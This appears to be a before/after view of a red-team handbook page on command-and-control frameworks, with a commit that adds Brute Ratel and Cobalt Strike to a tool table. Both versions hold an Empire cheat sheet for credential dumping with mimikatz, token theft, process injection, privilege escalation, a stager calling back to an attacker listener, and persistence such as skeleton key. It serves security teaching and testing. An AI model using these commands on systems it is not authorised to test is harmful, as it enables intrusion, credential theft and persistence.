handbooks/command_and_control.md, before:

# Command and Control

## Table of Contents

- [Resources](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/command_and_control.md#Resources)
- [Empire](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/command_and_control.md#Empire)

## Resources

| Name | Description | URL |
| --- | --- | --- |
| AzureC2Relay | AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile. | https://github.com/Flangvik/AzureC2Relay |
| Covenant | Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. | https://github.com/cobbr/Covenant |
| DeathStar | DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs. | https://github.com/byt3bl33d3r/DeathStar |
| Empire | Empire 4 is a post-exploitation framework that includes a pure-PowerShell Windows agents, Python 3.x Linux/OS X agents, and C# agents. | https://github.com/BC-SECURITY/Empire |
| Havoc | The Havoc Framework | https://github.com/HavocFramework/Havoc |
| KillDefenderBOF | Beacon Object File PoC implementation of KillDefender | https://github.com/Cerbersec/KillDefenderBOF |
| MoveKit | Cobalt Strike kit for Lateral Movement | https://github.com/0xthirteen/MoveKit |
| Mythic | A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming. | https://github.com/its-a-feature/Mythic |
| PoshC2 | A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement. | https://github.com/nettitude/PoshC2 |
| RedWarden | Cobalt Strike C2 Reverse proxy that fends off Blue Teams, AVs, EDRs, scanners through packet inspection and malleable profile correlation | https://github.com/mgeeky/RedWarden |
| SILENTTRINITY | An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR | https://github.com/byt3bl33d3r/SILENTTRINITY |
| Sliver | Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. | https://github.com/BishopFox/sliver |
| SharpLAPS | Retrieve LAPS password from LDAP | https://github.com/swisskyrepo/SharpLAPS |
| SPAWN | Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing. | https://github.com/boku7/SPAWN |

## Empire

> https://github.com/BC-SECURITY/Empire

> https://hackmag.com/security/powershell-empire/

### Basic Commands

```c
(Empire) > listeners                      // list current running listeners
(Empire) > uselistener                    // configure listener
(Empire) > agents                         // list available agents
(Empire) > kill <NAME>                    // kill a specific agent
(Empire: listeners/http) > info           // provide information about used listener or module
(Empire: listeners/http) > back           // get back from current menu
(Empire: listeners) > usestager           // creating payloads
(Empire: agents) > rename <NAME> <NAME>   // renaming specific agent
(Empire: agents) > interact <NAME>        // interacting with specific agent
(Empire: agents) > searchmodule <NAME>    // search for a specific module
(Empire: <NAME>) > usemodule <NAME>       // use a specific module
(Empire: <NAME>) > sysinfo                // show system information
(Empire: <NAME>) > creds                  // show credentials
(Empire: <NAME>) > download               // download files
(Empire: <NAME>) > upload                 // upload files
(Empire: <NAME>) > sleep <60>             // set agent communication to sleep for 60 seconds
(Empire: <NAME>) > steal_token            // impersonate access token
(Empire: <NAME>) > shell [cmd]            // open a shell with cmd.exe
(Empire: <NAME>) > ps                     // show running processes
(Empire: <NAME>) > psinject               // inject agent to another process
(Empire: <NAME>) > scriptimport           // load powershell script
(Empire: <NAME>) > mimikatz               // executes sekurlsa::logonpasswords
(Empire: <NAME>) > usemodule privesc/getsystem            // try privilege escalation
(Empire: <NAME>) > usemodule privesc/sherlock             // run sherlock
(Empire: <NAME>) > usemodule privesc/powerup/allchecks    // perform privilege escalation checks
(Empire: <NAME>) > usemodule situational_awareness/host/antivirusproduct    // provides information about antivirus products
(Empire: <NAME>) > usemodule situational_awareness/host/applockerstatus     // provides information about applocker status
(Empire: <NAME>) > usemodule situational_awareness/host/computerdetails     // provides information about event ids 4648 (RDP) and 4624 (successful logon)
(Empire: <NAME>) > situational_awareness/network/get_spn                       // provides information about spns
(Empire: <NAME>) > situational_awareness/network/powerview/get_domain_trust    // show information about domain trusts
(Empire: <NAME>) > situational_awareness/network/powerview/map_domain_trust    // map information about domain trust
(Empire: <NAME>) > situational_awareness/network/bloodhound3                   // load bloodhound module
(Empire: <NAME>/situational_awareness/network/bloodhound3) > set CollectionMethodAll    // configure bloodhound module
(Empire: <NAME>/situational_awareness/network/bloodhound3) > run                        // run the module
(Empire: <NAME>) > download *bloodhound*                                                // download the module
(Empire: <NAME>) > usemodule powershell/persistence/elevated/registry    // registry persistence
(Empire: <NAME>) > usemodule persistence/misc/add_sid_history            // sid history persistence
(Empire: <NAME>) > usemodule persistence/misc/memssp                     // ssp persistence
(Empire: <NAME>) > usemodule persistence/misc/skeleton_key               // skeleton key persistence
(Empire: <NAME>) > usemodule persistence/elevated/wmi                    // wmi persistence
```

### Setup HTTP Listener

```c
(Empire) > listeners http
(Empire: listeners/http) > info
(Empire: listeners/http) > set Name <NAME>
(Empire: listeners/http) > set Host <LHOST>
(Empire: listeners/http) > set Port <Port>
(Empire: listeners/http) > exeute
```

### Setup Stager

```c
(Empire: listeners) > usestager multi/bash
(Empire: listeners/multi/bash) > set Listener <NAME>
(Empire: listeners/multi/bash) > set OutFile /PATH/TO/FILE/<FILE>.sh
(Empire: listeners/multi/bash) > execute
```

### Setup Persistence Measures

```c
(Empire: <NAME>) > usemodule powershell/persistence/elevated/registry
(Empire: <NAME>/powershell/persistence/elevated/registry) > set Listener <NAME>
(Empire: <NAME>/powershell/persistence/elevated/registry) > run
```

Commit message:

added brute ratel and cobalt strike

handbooks/command_and_control.md, after:

# Command and Control

## Table of Contents

- [Resources](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/command_and_control.md#Resources)
- [Empire](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/command_and_control.md#Empire)

## Resources

| Name | Description | URL |
| --- | --- | --- |
| AzureC2Relay | AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile. | https://github.com/Flangvik/AzureC2Relay |
| Brute Ratel | A Customized Command and Control Center for Red Team and Adversary Simulation | https://bruteratel.com/ |
| Cobalt Strike | Adversary Simulation and Red Team Operations | https://www.cobaltstrike.com/ |
| Covenant | Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. | https://github.com/cobbr/Covenant |
| DeathStar | DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs. | https://github.com/byt3bl33d3r/DeathStar |
| Empire | Empire 4 is a post-exploitation framework that includes a pure-PowerShell Windows agents, Python 3.x Linux/OS X agents, and C# agents. | https://github.com/BC-SECURITY/Empire |
| Havoc | The Havoc Framework | https://github.com/HavocFramework/Havoc |
| KillDefenderBOF | Beacon Object File PoC implementation of KillDefender | https://github.com/Cerbersec/KillDefenderBOF |
| MoveKit | Cobalt Strike kit for Lateral Movement | https://github.com/0xthirteen/MoveKit |
| Mythic | A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming. | https://github.com/its-a-feature/Mythic |
| PoshC2 | A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement. | https://github.com/nettitude/PoshC2 |
| RedWarden | Cobalt Strike C2 Reverse proxy that fends off Blue Teams, AVs, EDRs, scanners through packet inspection and malleable profile correlation | https://github.com/mgeeky/RedWarden |
| SILENTTRINITY | An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR | https://github.com/byt3bl33d3r/SILENTTRINITY |
| Sliver | Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. | https://github.com/BishopFox/sliver |
| SharpLAPS | Retrieve LAPS password from LDAP | https://github.com/swisskyrepo/SharpLAPS |
| SPAWN | Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing. | https://github.com/boku7/SPAWN |

## Empire

> https://github.com/BC-SECURITY/Empire

> https://hackmag.com/security/powershell-empire/

### Basic Commands

```c
(Empire) > listeners                      // list current running listeners
(Empire) > uselistener                    // configure listener
(Empire) > agents                         // list available agents
(Empire) > kill <NAME>                    // kill a specific agent
(Empire: listeners/http) > info           // provide information about used listener or module
(Empire: listeners/http) > back           // get back from current menu
(Empire: listeners) > usestager           // creating payloads
(Empire: agents) > rename <NAME> <NAME>   // renaming specific agent
(Empire: agents) > interact <NAME>        // interacting with specific agent
(Empire: agents) > searchmodule <NAME>    // search for a specific module
(Empire: <NAME>) > usemodule <NAME>       // use a specific module
(Empire: <NAME>) > sysinfo                // show system information
(Empire: <NAME>) > creds                  // show credentials
(Empire: <NAME>) > download               // download files
(Empire: <NAME>) > upload                 // upload files
(Empire: <NAME>) > sleep <60>             // set agent communication to sleep for 60 seconds
(Empire: <NAME>) > steal_token            // impersonate access token
(Empire: <NAME>) > shell [cmd]            // open a shell with cmd.exe
(Empire: <NAME>) > ps                     // show running processes
(Empire: <NAME>) > psinject               // inject agent to another process
(Empire: <NAME>) > scriptimport           // load powershell script
(Empire: <NAME>) > mimikatz               // executes sekurlsa::logonpasswords
(Empire: <NAME>) > usemodule privesc/getsystem            // try privilege escalation
(Empire: <NAME>) > usemodule privesc/sherlock             // run sherlock
(Empire: <NAME>) > usemodule privesc/powerup/allchecks    // perform privilege escalation checks
(Empire: <NAME>) > usemodule situational_awareness/host/antivirusproduct    // provides information about antivirus products
(Empire: <NAME>) > usemodule situational_awareness/host/applockerstatus     // provides information about applocker status
(Empire: <NAME>) > usemodule situational_awareness/host/computerdetails     // provides information about event ids 4648 (RDP) and 4624 (successful logon)
(Empire: <NAME>) > situational_awareness/network/get_spn                       // provides information about spns
(Empire: <NAME>) > situational_awareness/network/powerview/get_domain_trust    // show information about domain trusts
(Empire: <NAME>) > situational_awareness/network/powerview/map_domain_trust    // map information about domain trust
(Empire: <NAME>) > situational_awareness/network/bloodhound3                   // load bloodhound module
(Empire: <NAME>/situational_awareness/network/bloodhound3) > set CollectionMethodAll    // configure bloodhound module
(Empire: <NAME>/situational_awareness/network/bloodhound3) > run                        // run the module
(Empire: <NAME>) > download *bloodhound*                                                // download the module
(Empire: <NAME>) > usemodule powershell/persistence/elevated/registry    // registry persistence
(Empire: <NAME>) > usemodule persistence/misc/add_sid_history            // sid history persistence
(Empire: <NAME>) > usemodule persistence/misc/memssp                     // ssp persistence
(Empire: <NAME>) > usemodule persistence/misc/skeleton_key               // skeleton key persistence
(Empire: <NAME>) > usemodule persistence/elevated/wmi                    // wmi persistence
```

### Setup HTTP Listener

```c
(Empire) > listeners http
(Empire: listeners/http) > info
(Empire: listeners/http) > set Name <NAME>
(Empire: listeners/http) > set Host <LHOST>
(Empire: listeners/http) > set Port <Port>
(Empire: listeners/http) > exeute
```

### Setup Stager

```c
(Empire: listeners) > usestager multi/bash
(Empire: listeners/multi/bash) > set Listener <NAME>
(Empire: listeners/multi/bash) > set OutFile /PATH/TO/FILE/<FILE>.sh
(Empire: listeners/multi/bash) > execute
```

### Setup Persistence Measures

```c
(Empire: <NAME>) > usemodule powershell/persistence/elevated/registry
(Empire: <NAME>/powershell/persistence/elevated/registry) > set Listener <NAME>
(Empire: <NAME>/powershell/persistence/elevated/registry) > run
```
